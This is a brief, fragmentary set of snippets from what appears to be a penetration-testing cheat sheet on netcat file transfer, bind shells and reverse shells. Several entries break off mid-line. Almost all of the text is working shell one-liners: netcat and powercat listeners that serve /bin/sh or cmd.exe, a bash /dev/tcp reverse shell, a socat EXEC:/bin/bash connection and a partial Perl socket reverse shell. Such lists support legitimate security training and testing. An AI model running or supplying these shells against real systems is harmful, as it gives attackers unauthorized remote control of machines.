nc -nv <ip>
nc -nvlp 4444
netcat Note: There will be no progress indicator, and the command will not terminate when complete. Estimate how long the transfer will take, terminate the command, and verify the file. Recei...
Netcat Server - Linux nc -nvlp 4444 -e /bin/sh Server - Windows nc -nlvp 4444 -e cmd.exe Client nc -nv <server ip> 4444 Powercat Server - Windows Standard powercat -l -p 443 -e c...
Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Socat socat -d -d TCP4-LISTEN:443 STDOUT socat TCP4:<ip>:443 EXEC:/bin/bash Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...
Bind Shells
Socat